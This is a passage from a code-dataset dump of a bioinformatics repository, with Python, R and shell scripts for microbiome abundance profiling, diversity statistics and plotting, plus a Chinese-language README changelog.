if abn_number > 0:\n target_dt = dt[item].loc[(dt[item] > UpLimit) | (dt[item] < DownLimit)].to_frame(name=item)\n filename = item + '_abnormal_values.txt'\n outpath = 'Abnormal_value/' + filename\n target_dt.to_csv(outpath, sep = '\\t') \n"
},
{
"alpha_fraction": 0.6568182110786438,
"alphanum_fraction": 0.6625000238418579,
"avg_line_length": 32.80769348144531,
"blob_id": "25cb91c1b500702ff7c485ea3ac21c5d36fa58a4",
"content_id": "33824472d7d830cd6abc3c4bdb667995f48e42bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 966,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 26,
"path": "/article.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# calculate the frequency of occurence of ciations in an article\n# 统计文章中引文出现的次数,需要提供引文和正文内容,引文格式为 [数字],需要的文件在 Data 目录下;\nimport re\nquotation = dict()\nwith open('quotation.txt', 'r') as IN:\n\tfor line in IN:\n\t\tline = line.strip('\\n')\n\t\tmatch = re.search('(\\d+)\\. (.*)', line)\n\t\tif match:\n\t\t\tnumber = match.group(1)\n\t\t\tarticle_name = match.group(2)\t\n\t\t\tquotation[int(number)] = article_name\n\nfrom collections import defaultdict\ncounts = defaultdict(int) #values will initialize to 0\nwith open('content.txt', 'r') as IN:\n\tfor line in IN:\n\t\tmatch = re.findall('\\[(\\d+)\\]',line)\n\t\tif match:\n\t\t\tfor x in match:\n\t\t\t\tcounts[int(x)] += 1 \nwith open('results.txt', 'w') as out:\n\tprint('citation_number\\tfrequency of occurrence\\tarticle_title', file = out)\n\tfor key in sorted(counts.keys()):\n\t\tprint(str(key) + '\\t' + str(counts[key]) + '\\t' + quotation[key], file = out)\n\n"
},
{
"alpha_fraction": 0.7358490824699402,
"alphanum_fraction": 0.7433962225914001,
"avg_line_length": 28.44444465637207,
"blob_id": "432ded91e3cc7964cfa83c819f4faa6a5274cab5",
"content_id": "1b1d42a2ddf4fb385d898ed9ace94c06bbe40aa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 9,
"path": "/data_delivery_scps.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 和 dta_delivery_scp.expect 联用,实现批量传输\n#! /bin/bash\nlist_file=$1 #file path each line\ndest_dir=$2 #the destination directory\ncat $list_file | while read line\ndo\necho \"Processing file:scp the $line to $dest_dir\"\nexpect data_delivery_scp.expect $line $dest_dir\ndone\n"
},
{
"alpha_fraction": 0.6629688143730164,
"alphanum_fraction": 0.6925514936447144,
"avg_line_length": 46.32500076293945,
"blob_id": "582a08d7f97973af1ba79be8ac41edb5aa8e6a6e",
"content_id": "d0edaccbdc34f930bebc2bbea56dd9fb8cc3e50e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2033,
"license_type": "no_license",
"max_line_length": 280,
"num_lines": 40,
"path": "/Correlation/SparCC.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#使用 SparCC 计算相关性,https://bitbucket.org/yonatanf/sparcc/overview\n##usage: python /Users/tongxueer/Documents/R/run_sparcc.py example/fake_data.txt fake outdir\n### 运行该脚本比较麻烦...需要特定的 Python 版本以及相应的库版本,查到了使用 conda 进入虚拟环境的解决办法(还是挺方便的,除了每次都得进入比较麻烦)\n### \n$ conda create --name SparCC python=2.6.9\n$ source activate SparCC\n$ conda install python-dateutil=2.4.2\n$ conda install numpy=1.9.2 pandas=0.16.2\n$ conda install libcxx\n####\n\nimport sys,os\nabdfile = sys.argv[1] #/Users/tongxueer/Documents/R/p_0.05.new.name.profile.xls\nprefix = sys.argv[2] # mgs\noutdir = sys.argv[3] # ./\nif not os.path.exists(outdir):\n\tos.makedirs(outdir)\n\nsparcc = outdir + '/' + prefix + '_sparcc.txt'\ncov_sparcc = outdir + '/' +prefix + '_cov_sparcc.txt'\nos.system('python /Users/tongxueer/Documents/R/yonatanf-sparcc-3aff6141c3f1/SparCC.py ' + abdfile + ' -c ' + sparcc + ' -v ' + cov_sparcc)\n\n#repeat 100\noutput = outdir + '/pseudo'\nif not os.path.exists(output):\n\tos.makedirs(output)\nos.system('python /Users/tongxueer/Documents/R/yonatanf-sparcc-3aff6141c3f1/MakeBootstraps.py ' + abdfile + ' -p ' + output + '/ -t permuted_#')\n\ncorr_dir = outdir + '/boot_' + prefix + '_corr'\nif not os.path.exists(corr_dir):\n\tos.makedirs(corr_dir)\ncov_dir = outdir + '/boot_' + prefix + '_cov'\nif not os.path.exists(cov_dir):\n\tos.makedirs(cov_dir)\nos.system('for i in `seq 0 99`; do python /Users/tongxueer/Documents/R/yonatanf-sparcc-3aff6141c3f1/SparCC.py ' + output + '/permuted_$i -c ' + corr_dir + '/simulated_sparcc_$i.txt -v ' + cov_dir + '/simulated_sparcc_$i.txt >> ' + outdir + '/' + prefix + '_boot_sparcc.log; done')\n\npvals_dir = outdir + '/' + prefix + '_pvals'\nif not os.path.exists(pvals_dir):\n\tos.makedirs(pvals_dir)\nos.system('python /Users/tongxueer/Documents/R/yonatanf-sparcc-3aff6141c3f1/PseudoPvals.py ' + sparcc+ ' ' + corr_dir + '/simulated_sparcc_#.txt 100 -o ' + pvals_dir + '/one_sided.txt -t one_sided')\n"
},
{
"alpha_fraction": 0.6320919394493103,
"alphanum_fraction": 0.6619144678115845,
"avg_line_length": 51.07575607299805,
"blob_id": "8c79a5ca0016a1d435c7dbc054ade5407dc86e68",
"content_id": "5613b41037ba6963c5299f4e0e647a1c293b1781",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6924,
"license_type": "no_license",
"max_line_length": 490,
"num_lines": 132,
"path": "/CHD/boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#直接画患者和健康人的差异物种, 门水平\nlibrary(ggplot2)\nlibrary(dplyr)\ndt = read.table('phylum_boxplot.txt', header=T)\n\ngroup_list = \"NCA:sCAD:AMI\"\ncolor_list = \"24af2d:ea5e74:e80211\"\n#tax_list = \"Firmicutes:Bacteroidetes:Proteobacteria:Actinobacteria:Verrucomicrobia:Euryarchaeota:Viruses_noname:Fusobacteria:Synergistetes:Candidatus_Saccharibacteria\"\ntax_list = \"Verrucomicrobia:Synergistetes\"\nlegend_list = c(unlist(strsplit(group_list, \":\")))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\ntax_order = c(unlist(strsplit(tax_list, \":\")))\n\ndt$group_order<-factor(dt$Group, legend_list)\ndt$ID_order<-factor(dt$ID, tax_order)\np = ggplot(dt,aes(x = ID_order, y = log10(Abd))) +\ngeom_boxplot(aes(fill = factor(group_order)), fatten = 1, lwd = 0.5, outlier.size = 0.5, position = position_dodge(0.8)) +\nlabs(x ='', y = \"Relative~abundance\", fill = '', color = '', size = 10 ) +\nscale_fill_manual(values = color_var) + \ntheme(\n axis.text = element_text(colour = 'black', size = 10),\n axis.text.x = element_text(angle = 0),\n #axis.text.x = element_text(hjust = 1, angle = 0), #phylum\n# axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n# axis.text.x = element_text(hjust = 1, face = 'italic', angle = 60), #species\n axis.title.y = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n #legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 8),\n legend.key.width = unit(0.15, 'in'),\n legend.key.height = unit(0.15, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n)\npostscript(paste(\"phylum_boxplot.eps\",sep=\"\"), width = 6, height=4)\npdf(paste(\"phylum_boxplot.pdf\",sep=\"\"), width = 6, height=4)\np\ndev.off()\n\n\n## 种水平\nlibrary(ggplot2)\nlibrary(dplyr)\ndt = read.table('species_boxplot.txt', header=T)\n\ngroup_list = \"NCA:sCAD:AMI\"\ncolor_list = \"24af2d:ea5e74:e80211\"\ntax_list = \"Alistipes_onderdonkii:Coprococcus_sp_ART55_1:Megasphaera_unclassified:Dialister_succinatiphilus:Lactobacillus_amylovorus:Lactobacillus_salivarius:Lactobacillus_mucosae:Lactobacillus_crispatus:Enterobacter_cloacae:Coprococcus_eutactus:Phascolarctobacterium_succinatutens:Bifidobacterium_bifidum:Citrobacter_unclassified:Citrobacter_freundii:Prevotella_stercorea:Sutterella_wadsworthensis:Prevotella_bivia:Fusobacterium_mortiferum:Prevotella_disiens:Elizabethkingia_unclassified\"\nlegend_list = c(unlist(strsplit(group_list, \":\")))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\ntax_order = c(unlist(strsplit(tax_list, \":\")))\n\ndt$group_order<-factor(dt$Group, legend_list)\ndt$ID_order<-factor(dt$ID, tax_order)\np = ggplot(dt,aes(x = ID_order, y = log10(Abd))) +\n geom_boxplot(aes(fill = factor(group_order)), fatten = 1, lwd = 0.5, outlier.size = 0.5, width = 0.8, position = position_dodge(0.8)) +\n # labs(x ='', y = expression(Relative~abundance~(log['10'])), fill = '', color = '', size = 10 ) +\n labs(x ='', y = \"Relative abundance\", fill = '', color = '', size = 10 ) +\n geom_vline(xintercept=c(14.5), linetype=\"dotted\") + \n scale_fill_manual(values = color_var) +\n theme(\n axis.text = element_text(colour = 'black', size = 10),\n # axis.text.x = element_text(angle = 0),\n #axis.text.x = element_text(hjust = 1, angle = 0), #phylum\n # axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n axis.text.x = element_text(hjust = 1, face = 'italic', angle = 60), #species\n axis.title.y = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n #legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 10),\n legend.key.width = unit(0.2, 'in'),\n legend.key.height = unit(0.2, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n )\n#postscript(paste(\"species_boxplot.eps\",sep=\"\"), width = 8, height=5)\npdf(paste(\"species_boxplot.pdf\",sep=\"\"), width = 8, height=4)\np\ndev.off()\n\n## 五个种水平\nlibrary(ggplot2)\nlibrary(dplyr)\ndt = read.table('five_species_boxplot.txt', header=T)\n\ngroup_list = \"NCA:sCAD:AMI\"\ncolor_list = \"24af2d:ea5e74:e80211\"\n#tax_list = \"Alistipes_onderdonkii:Coprococcus_sp_ART55_1:Megasphaera_unclassified:Dialister_succinatiphilus:Lactobacillus_amylovorus:Lactobacillus_salivarius:Lactobacillus_mucosae:Lactobacillus_crispatus:Enterobacter_cloacae:Coprococcus_eutactus:Phascolarctobacterium_succinatutens:Bifidobacterium_bifidum:Citrobacter_unclassified:Citrobacter_freundii:Prevotella_stercorea:Sutterella_wadsworthensis:Prevotella_bivia:Fusobacterium_mortiferum:Prevotella_disiens:Elizabethkingia_unclassified\"\ntax_list = \"Alistipes_onderdonkii:Lactobacillus_mucosae:Lactobacillus_crispatus:Pyramidobacter_piscolens:Atopobium_parvulum\"\nlegend_list = c(unlist(strsplit(group_list, \":\")))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\ntax_order = c(unlist(strsplit(tax_list, \":\")))\n\ndt$group_order<-factor(dt$Group, legend_list)\ndt$ID_order<-factor(dt$ID, tax_order)\np = ggplot(dt,aes(x = ID_order, y = log10(Abd))) +\n geom_boxplot(aes(fill = factor(group_order)), fatten = 1, lwd = 0.5, outlier.size = 0.5, width = 0.8, position = position_dodge(0.8)) +\n # labs(x ='', y = expression(Relative~abundance~(log['10'])), fill = '', color = '', size = 10 ) +\n labs(x ='', y = \"Relative abundance\", fill = '', color = '', size = 10 ) +\n #geom_vline(xintercept=c(14.5), linetype=\"dotted\") + \n scale_fill_manual(values = color_var) +\n theme(\n axis.text = element_text(colour = 'black', size = 10),\n # axis.text.x = element_text(angle = 0),\n #axis.text.x = element_text(hjust = 1, angle = 0), #phylum\n # axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n axis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #species\n axis.title.y = element_text(size = 10, face = 'bold'),\n axis.line = element_line(size=0.5, colour = \"black\"),\n #legend.position = c(0,0),\n legend.justification = c(0,0),\n legend.key = element_blank(),\n legend.text = element_text(size = 10),\n legend.key.width = unit(0.2, 'in'),\n legend.key.height = unit(0.2, 'in'),\n legend.background = element_blank(),\n panel.background = element_blank(),\n plot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n )\n#postscript(paste(\"species_boxplot.eps\",sep=\"\"), width = 8, height=5)\npdf(paste(\"five_species_boxplot.pdf\",sep=\"\"), width = 8, height=4)\np\ndev.off()\n"
},
{
"alpha_fraction": 0.6129523515701294,
"alphanum_fraction": 0.6434285640716553,
"avg_line_length": 49.480770111083984,
"blob_id": "bcf2841636e0837504b7b277caf523dd30c3431a",
"content_id": "02028c1ef7910ab9a1b691db1d1f244cea093217",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2657,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 52,
"path": "/CHD/beta.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# beta, 种, 画 beta 的箱线图,同时标注显著性差异\ninput = 'intra_distance.txt' # alpha diversity file, including number and shannon\noutdir = './beta/'\ngroup_list = 'sCAD:AMI:sCAD-AMI' # E-liquid:Cigarette\ncolor_list = 'ea5e74:aa75b3:08519C' # 487eb3:d2382c\ndt = read.table(input, header = T,sep = '\\t', row.names = 1, check.names = F)\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nlegend_list = unlist(strsplit(group_list, \":\"))\nfilename_prefix= gsub(\":\", \"_\", group_list)\n\nlibrary(ggplot2)\nlibrary(ggpubr)\ndt$group = factor(dt$group, levels=legend_list)\n\ndiff = compare_means(distance ~ group, dt, method = \"wilcox.test\") ## default wilcox.test\nwrite.table(diff,file = paste(outdir,filename_prefix,\"_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) {\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n\tmy_comparisons[[row]] = diff_group\n}\nplot = ggplot(dt,aes(x=group, y=distance)) + \n geom_violin(aes(fill=group)) + \n geom_boxplot(width = 0.2) + \n scale_fill_manual(values= color_var) +\n stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.04,0.13,0.09) + max(dt$distance)) + scale_color_manual(values= color_var) + \n labs(x=\"\", y = \"Bray distance\") + scale_y_continuous(limits = c(min(dt$distance), max(dt$distance)*1.15)) +\n theme(axis.text = element_text(colour = 'black', size = 12),\n #axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 12),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.1,0.1, 0.1, 0.1), 'in')) #top right bottom left\n} else {\nplot = ggplot(dt,aes(x=group, y=distance, colour=group)) + geom_boxplot() + scale_color_manual(values= color_var) + labs(x=\"\", y = \"bray distance\") +\n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3,0.3, 0.3, 0.3), 'in'))\n}\n#output\npdf(paste(outdir,filename_prefix,\"_beta_boxplot.pdf\",sep=\"\"),width=3.2,height=3)\nplot\ndev.off()\n"
},
{
"alpha_fraction": 0.6715542674064636,
"alphanum_fraction": 0.7601172924041748,
"avg_line_length": 32.21428680419922,
"blob_id": "f5f36d15ed4c5812664036e4b669aaeae0759e0b",
"content_id": "739c711e67b5dffb79bdc748880f881e49e2f94d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9347,
"license_type": "no_license",
"max_line_length": 305,
"num_lines": 154,
"path": "/README.md",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# Bioinformatics\n\n***\n20180626 diversity.py \n用 python3 的 pandas 计算了基于丰度表的丰富度和 shannon 物种多样性指数,相比较之前写脚本遍历计算,基于数据框的运算爽很多. 命名为之 diversity.py,目前只能计算两个,以后看情况再加咯.\n\n***\n20180627 2017年影响因子 20180626.xlsx \n增加了刚出的截止至 2017 年杂志的影响因子(Journal Citation Reports).\n\n***\n20180710 NCBIscrapy.py \n利用 python3 的爬虫帮别人爬取 NCBI 网站上的一些东西,比较简单,留作记录.\n\n***\n20180714 geneInsample.py \n得到基因丰度表以后,计算基因在样本中的存在情况,如至少在 10% 的样本存在的基因有多少,20%,30%... 以此类推.\n并且按照需要输出低于某一阈值的基因 ID, 用来后续分析的过滤,如在少于 10% 样品中存在的基因 ID. \n\n***\n20180714 numToid.py \n接上一步,过滤出来至少在 10% 样品中存在的基因编号后,需要得到相应的基因 ID (因为之前基因长度文件配置的缘故,现在要替换回来). \n没有用字典,试着用 pandas 的 concat 功能, 将两个数据集按照行索引取交集合并,提取编号和与之对应的 ID, 单独输出到文件. \n\n***\n20180718 补充 geneInsample.py \n修改 geneInsample.py, 使得脚本能输出高于某一阈值的基因丰度表,如大于 10% 样本中存在的所有基因的丰度表,用于物种丰度表的表征. \n\n***\n20180718 \nprofileNorm.R: 将上一步生成的物种丰度文件(用别人的脚本生成)归一化处理,即每列加和数字等于 1. \nplotIdGenerate.py: 统计丰度表中,所有大于 1(1%)的物种的 ID, 画柱状图时, 需要把在所有样品中小于 1% 的物种合并为 others, 想了半天才想起来这个脚本的功能,必须得做好日志文件呀. \n\n***\n20180725 \nsmall_script.py 统计基因注释文件里,注释到门,属,种水平的基因个各有多少,全程用了 pandas, 用到了 pandas 的切分某列,将 None 替换为 Nan, 按照列计数,还有 unique 功能. \n\n***\n20180726 \nbraycurtis.py 根据丰度文件计算 bray-curtis 距离,生成样品之间的距离矩阵,没有找到 python3 比较便捷的方法,所以自己用笨的办法写了脚本, 待完善;\n\n***\n20180730 \nSplitbyRownames.py 根据行名包含哪些字符将数据框分开,R 对应的功能没有找到,但是 pyhton3 有,R 目前只知道根据行名筛选的(select)功能,待完善; \n\n***\n20180731 \nheatmap.R 根据计算出来的 braycurtis 距离矩阵,画热图,并且进行按照分组进行标识; \n参考链接:[R语言绘制热图——pheatmap - CSDN博客](https://blog.csdn.net/sinat_38163598/article/details/72770404) \n\nboxplot.R 箱线图与差异检验(wilcox.test) \n\n*** \n20180805 \npermutation.R 置换检验, Permutation test 置换检验是 Fisher于20世纪30年代提出的一种基于大量计算(computationally intensive),利用样本数据的全(或随机)排列,进行统计推断的方法,因其对总体分布自由,应用较为广泛,特别适用于总体分布未知的小样本资料, 以及某些难以用常规方法分析资料的假设检验问题。在具体使用上它和Bootstrap Methods类似,通过对样本进行顺序上的置换,重新计算统计检验量,构造经验分布,然后在此基础上求出P-value进行推断,简单记录; \n参考链接:[置换检验(R语言实现)](https://blog.csdn.net/zhouyijun888/article/details/69524200) \n\n***\n20180815\nPCoA.R 看了好长时间的文献后,终于可以写脚本了,写好了 PCoA 分析,这个貌似网上不怎么能找得到比较好的教程,所以花费时间比较久; \n新建了一个 Data 文件夹,用来放置脚本处理的源文件,方便以后的重现,毕竟脚本多了可能记不起来了; \n还是写脚本比较舒服; \n\n***\n20180816 \nanosim.R anosim 分析,ANOSIM (analysis ofsimilarities) 分析,也叫相似性分析,主要是用于分析高维度数据组间,相似性的统计方法,比如我们经常做完PCoA、NMDS等降维分析的时候(如下图),看着组,间样本是区分开的,但是缺少一个P值,说明这种差异到底是否显著。 \n参考链接:[什么是ANOSIM分析](http://www.360doc.com/content/18/0113/21/33459258_721682039.shtml)\n\n***\n20180823 \nupset.R 花了点儿时间摸索了个软件,可以代替 venn 图查看多个数据集的交集情况, [软件参考链接](http://caleydo.org/tools/upset/) 目前实现的功能还比较简单, 因为暂且不需要多复杂。 \n\n*** \n20180824 \n增加 calypso.py 用来将物种丰度表的结果文件处理成 calypso 软件可以上传的格式; \n\n***\n20180920 \n好久没更新,因为没怎么写代码 \n重新写了 PCA 的 R 代码,增加两个主坐标的差异检验,并且标注显著差异的值,将三张图输出在一个 PDF; \n同时会更新 PCoA.R 的代码; \n部分参考链接: \n[R语言可视化学习笔记之添加p-value和显著性标记 | Logos](https://ytlogos.github.io/2017/06/25/R%E8%AF%AD%E8%A8%80%E5%8F%AF%E8%A7%86%E5%8C%96%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%B7%BB%E5%8A%A0p-value%E5%92%8C%E6%98%BE%E8%91%97%E6%80%A7%E6%A0%87%E8%AE%B0/) \n[R语言grid包使用笔记——viewport](https://blog.csdn.net/vivihe0/article/details/47188329) \n[将多张图输出到一个或者多个 PDF 上](http://www.sthda.com/english/articles/24-ggpubr-publication-ready-plots/81-ggplot2-easy-way-to-mix-multiple-graphs-on-the-same-page/) \n\n***\n20180924 \n乘着中秋放假,增加 adonis 分析的脚本 adonis.R, 比较简单,后边肯定还得继续完善; \n祝自己中秋快乐咯,需要努力学习; \n只剩下钢琴陪我谈了一天; \n参考链接: [RPubs - Multivariate analyses of variance](https://rpubs.com/collnell/manova) \n\n***\n20180926 \n增加了帮 Neko 写的一个脚本 run_Combine_gvcf.py,她要走啦,留作纪念好了 \n\n***\n20181008 \n修改了 PCA 和 PCoA 的脚本,之前没有考虑到差异结果没有显著的情况,导致报错; \n果然不断的迭代才是好的方法,你不可能一次性把所有情况考虑清楚的。不过第一次还是尽可能的多考虑; \n\n*** \n20181022 \n越来越忙了,增加了批量生成 metawrap 组装的脚本 getScript.py,果然需要批量生成..任何手动的东西真是太可恶了! \n\n*** \n20181023 \n增加了 anova 的脚本 anova.R,包括方差齐性检验,正态分布检验,mean+se 的柱状图输出。断断续续终于写完了,还不是很完善,也没有弄成通用的,因为时间\n不怎么够用,等下下次需要用的时候再改吧。 写得过程中参考了很多有用的博客,如 [One-Way ANOVA Test in R - Easy Guides - Wiki - STHDA](http://www.sthda.com/english/wiki/one-way-anova-test-in-r), [Plotting means and error bars (ggplot2)](http://www.cookbook-r.com/Graphs/Plotting_means_and_error_bars_(ggplot2)/), 非常感谢~ 同时好多想要的功能也没有完善,后续有需要再修改吧。 \n\n*** \n20181024 \n增加了一个 python 脚本,SelectandMerge.py, 项目分析中用到; \n\n*** \n20190420 \n久违的更新,距离上一次已经 6 个月了... 自己仍旧没有取得特别大的进步,这次是增加了多元线性回归的一个脚本 multiple_liner.R,勉强把这个东西大致弄懂了,待完善,要去吃晚饭.. \n\n*** \n20200311 \n将近一年了... 没有写这个文档,回头看还是蛮有感触的... 这大概是记录的意义所在吧~ \n增加了 paper_information.py 脚本,用于输入文献官网网址,爬取杂志名称,发表时间,影响因子等信息,待完善补充; \n\n*** \n2020年3月11日 下午9:38 \n良心发现,加快更新(其实是因为在整理项目); 增加了表型处理的脚本 abnormal_values.py ,包括缺失值和异常值,待完善; \n\n\n*** \n2020年3月13日 上午8:50 \n增加了三组差异检验箱线图的显著性标识生成脚本 diff_label.py, 待完善;芒格说,每天进步一点点,加油~ \n\n \n*** \n2020年3月15日 上午11:08 \n增加了三个脚本,分别是离散型变量表型的差异检验:cat_diff.R, 以及其结果整理的脚本:cat_result.py, 还有连续型表型变量的差异检验的结果整理:con_result.py, 待完善; 我说:即使状态再差,也有自己能做的事情; \n\n*** \n2020年3月15日 下午9:19 \n增加了倾向性评分脚本 propensity_score.R 待完善; 相应的博客文章见这里[倾向性评分 | Propensity score](https://nonewood.github.io/2020/03/15/propensity-score/) \n是一个充实的周末没错了... 略累... 待会儿去画画; \n\n*** \n2020年4月10日 \n因为项目需要,增加脚本 multi_roc.R ,用于表型信息的 ROC 分类,比较简单,待优化,博客文章见这里[表型信息的ROC曲线|multi_roc.R](https://nonewood.github.io/2020/04/10/phenotype-roc/); \n\n*** \n2020年5月11日 \n增加了文献信息爬虫脚本,advanced_paper_information.py, 只需提供文献题目,可爬取影响因子,发表时间,杂志名称等信息;\n\n*** \n2020年7月13日 \n整理脚本的时候,增加了之前写好的 eastmoney.py ,很粗糙的版本...\n"
},
{
"alpha_fraction": 0.6109113693237305,
"alphanum_fraction": 0.6227532029151917,
"avg_line_length": 40.12173843383789,
"blob_id": "764a041e2a55dc0ff1871eb6c56928b6885402f5",
"content_id": "03110c6a6f87120d4168d595d1db317ca371a4e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4729,
"license_type": "no_license",
"max_line_length": 314,
"num_lines": 115,
"path": "/Kraken2/kraken.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport pandas as pd\nimport argparse,os,shutil,re\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nGenerate the profile files(kingdom, phylum, genus..) for all samples of kraken2 results.\nExample: python3 kraken.py -i /ifswh1/BC_COM_P2/F18FTSNCWLJ0169/HUMnzsM/HUMrfvM/metawrap/Kraken/sampleID -d /ifswh1/BC_COM_P2/F18FTSNCWLJ0169/HUMnzsM/HUMrfvM/metawrap/Kraken/KRAKEN -l kingdom,phylum,class,order,family,genus,species -o /ifswh1/BC_COM_P2/F18FTSNCWLJ0169/HUMnzsM/HUMrfvM/metawrap/Kraken/KRAKEN/Outdir\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--sampleID', help = \"the sample id list file, tab separated.\")\nparser.add_argument('-d','--directory', help = \"the kraken2 output directory.\")\nparser.add_argument('-l','--level', help = \"choose the taxonomic levels for profile files, semicolon(,) separated. (optional:kingdom,phylum,class,order,family,genus,species), default is phylum,genus,species.\", nargs='?')\nparser.add_argument('-o','--outdir',help = \"the output directory, full path.\")\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\n(IDlist, directory, outdir) = (args.sampleID, args.directory, args.outdir)\npar = [IDlist, directory, outdir]\n\nif not all(par):\n\tparser.print_help()\n\texit()\n\nlevels = args.level if args.level else 'phylum,genus,species'\nlevel_list = levels.split(',')\n\nif os.path.exists(outdir):\n\tshutil.rmtree(outdir)\n\t\nos.makedirs(outdir)\nwith open(IDlist, 'r') as idfile:\n\tfor line in idfile:\n\t\tidlist= line.strip('\\n').split('\\t')\t\t\n\t\tfor sample in idlist:\n\t\t\tkrakfile = directory + '/' + sample + '.RemoveHost.krak'\n\t\t\treportfile = directory + '/' + sample + '.RemoveHost.report'\n\t\t\tline_number = os.popen('wc -l ' + krakfile).read()\n\t\t\treads_number = line_number.split(' ')[0]\t\t\t\n\t\t\twith open(reportfile, 'r') as report:\n\t\t\t\tfor line in report:\n\t\t\t\t\tline = line.strip('\\n')\n\t\t\t\t\tlst = line.split('\\t')\n\t\t\t\t\tname_list = lst[0].split('|')\n\t\t\t\t\tif 'kingdom' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_kingdom_profile.temp'\n\t\t\t\t\t\tif re.match('d__',name_list[-1]):\n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Kingdom:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Kingdom)\n\t\t# Phylum\t\n\t\t\t\t\tif 'phylum' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_phylum_profile.temp'\n\t\t\t\t\t\tif re.match('p__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Phylum:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Phylum)\n\t\t# Class\t\n\t\t\t\t\tif 'class' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_class_profile.temp'\n\t\t\t\t\t\tif re.match('c__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Class:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Class)\n\t\t# Order\n\t\t\t\t\tif 'order' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_order_profile.temp'\t\t\n\t\t\t\t\t\tif re.match('o__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Order:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Order)\n\t\t#Family\n\t\t\t\t\tif 'family' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_family_profile.temp'\n\t\t\t\t\t\tif re.match('f__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as 